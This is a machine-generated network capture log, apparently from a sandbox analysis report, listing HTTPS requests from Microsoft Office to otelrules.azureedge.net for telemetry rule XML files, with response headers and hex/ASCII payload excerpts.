                                                                                        2024-11-30 11:48:47 UTC1397INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSys


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        108192.168.2.44985813.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:46 UTC192OUTGET /rules/rule700350v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:47 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:46 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1360
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:40 GMT
                                                                                        ETag: "0x8DC582BDD74D2EC"
                                                                                        x-ms-request-id: a0e0d5c5-a01e-0084-68de-419ccd000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114846Z-174f7845968vqt9xhC1EWRgten00000011bg000000008v7m
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:47 UTC1360INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 79 73 74 65 6d 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.System" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSystem" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        109192.168.2.44985913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:46 UTC192OUTGET /rules/rule703901v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:47 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1427
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:53 GMT
                                                                                        ETag: "0x8DC582BE56F6873"
                                                                                        x-ms-request-id: 417f12c6-b01e-003e-571e-428e41000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114847Z-174f7845968nxc96hC1EWRspw8000000111g00000000933v
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:47 UTC1427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703901" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="Nexu


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        110192.168.2.44986013.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:46 UTC192OUTGET /rules/rule703900v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:47 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1390
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:49 GMT
                                                                                        ETag: "0x8DC582BE3002601"
                                                                                        x-ms-request-id: e52eaca9-401e-0064-32a1-4254af000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114847Z-174f78459685726chC1EWRsnbg00000011bg0000000098f9
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:47 UTC1390INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 39 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 72 76 69 63 65 61 62 69 6c 69 74 79 4d 61 6e 61 67 65 72 22 20 53 3d
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703900" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ServiceabilityManager" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenServiceabilityManager" S=


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        111192.168.2.44986113.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:46 UTC192OUTGET /rules/rule701501v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:47 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:47 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1401
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:48 GMT
                                                                                        ETag: "0x8DC582BE2A9D541"
                                                                                        x-ms-request-id: 70a2a6ee-001e-00a2-299e-42d4d5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114847Z-174f7845968n2hr8hC1EWR9cag00000010x000000000as78
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:47 UTC1401INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701501" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenS


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        112192.168.2.44986213.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:48 UTC192OUTGET /rules/rule701500v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:49 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1364
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                        ETag: "0x8DC582BEB6AD293"
                                                                                        x-ms-request-id: 902f1521-d01e-00a1-2fef-4135b1000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114849Z-174f7845968j6t2phC1EWRcfe800000011dg000000009yhv
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:49 UTC1364INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 35 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 65 63 75 72 69 74 79 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 65 63 75 72 69 74 79 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701500" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Security" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSecurity" S="Medium" /> <F T="2">


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        113192.168.2.44986313.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:48 UTC192OUTGET /rules/rule702801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:49 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1391
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                        ETag: "0x8DC582BDF58DC7E"
                                                                                        x-ms-request-id: 6de228a0-301e-0052-2e05-4165d6000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114849Z-174f7845968psccphC1EWRuz9s00000011qg000000002phq
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:49 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        114192.168.2.44986413.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:49 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:49 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1354
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                                                                                        ETag: "0x8DC582BE0662D7C"
                                                                                        x-ms-request-id: 1f887815-401e-0029-26a9-429b43000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114849Z-174f7845968qj8jrhC1EWRh41s00000011ag000000005srm
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:49 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        115192.168.2.44986513.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:49 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:49 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1403
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                        ETag: "0x8DC582BDCDD6400"
                                                                                        x-ms-request-id: ee9d2ac9-001e-00a2-1991-3fd4d5000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114849Z-174f78459688l8rvhC1EWRtzr00000000dwg000000008v75
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:49 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        116192.168.2.44986613.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:49 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:49 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:49 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1366
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                        ETag: "0x8DC582BDF1E2608"
                                                                                        x-ms-request-id: 75b435a0-401e-0048-0433-400409000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114849Z-174f78459685726chC1EWRsnbg00000011h00000000019sg
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:49 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        117192.168.2.44986713.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:51 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-11-30 11:48:51 UTC494INHTTP/1.1 200 OK
                                                                                        Date: Sat, 30 Nov 2024 11:48:51 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 1399
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                        x-ms-request-id: 8a8d0990-701e-0021-2191-3f3d45000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241130T114851Z-174f7845968kdththC1EWRzvxn0000000dsg0000000049y6
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-11-30 11:48:51 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                        118192.168.2.44986913.107.246.63443
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-11-30 11:48:51 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
